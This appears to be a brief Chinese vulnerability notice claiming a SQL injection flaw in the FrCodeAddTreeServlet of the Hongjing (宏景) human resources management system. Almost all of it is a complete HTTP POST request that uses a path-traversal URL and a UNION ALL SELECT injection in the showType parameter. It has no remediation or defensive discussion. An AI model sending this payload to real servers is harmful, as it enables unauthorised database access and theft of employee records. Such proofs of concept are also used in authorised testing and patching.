漏洞描述
宏景人力资源管理系统 FrCodeAddTreeServlet 存在SQL注入漏洞
POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
params=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1'+UNION+ALL+SELECT+123,NULL,NULL,NULL,NULL,NULL--+